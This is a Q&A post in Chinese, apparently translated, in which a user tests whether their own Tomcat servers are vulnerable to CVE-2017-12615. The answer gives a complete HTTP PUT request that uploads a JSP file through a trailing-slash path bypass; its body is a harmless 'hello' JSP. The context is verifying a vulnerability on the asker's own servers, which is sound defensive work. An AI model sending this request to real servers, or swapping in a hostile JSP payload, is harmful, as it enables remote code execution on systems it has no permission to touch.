我在Windows上运行了tomcat 6.x,7.x和8.x以及Jboss 7.2.x AS服务器。我在webapps目录下创建了一个Web应用程序。我修改了$ TOMCAT_HOME / conf / web.xml并将readonly参数设置为false(默认情况下为true)。然后,我运行了漏洞利用https://www.exploit-db.com/exploits/42966/ - 这是一个尝试使用HTTP PUT上传有效负载的python脚本。
我运行了以下命令行:
python 42966.py -u http://localhost:9292/ExploitTest
我得到了一个
1)来自tomcat 8.0.x的Http 404状态(未找到资源),
2)来自tomcat 6.x和
的Http 400状态(错误请求)
3)来自tomcat 7.x的Http 400状态。
我原以为运行上面的python漏洞会导致tomcat服务器中出现HTTP 201(新创建的资源)。这个漏洞有什么问题?或者我没有正确设置tomcat的漏洞?是否存在基于curl或java或此漏洞的任何其他工作漏洞,我可以使用它来验证我的服务器确实是否容易受到攻击?
答案 0 :(得分:1)
在https://www.peew.pw/blog/2017/10/9/new-vulnerability-same-old-tomcat-cve-2017-12615找到答案。最初,请求位于https://bz.apache.org/bugzilla/show_bug.cgi?id=61542。
我使用Burp Suite按上述链接制作POC请求
PUT /1.jsp/ HTTP/1.1
Host: 192.168.3.103:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.3.103:8080/examples/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
Connection: close
Content-Length: 26
<% out.println("hello");%>
这就是诀窍!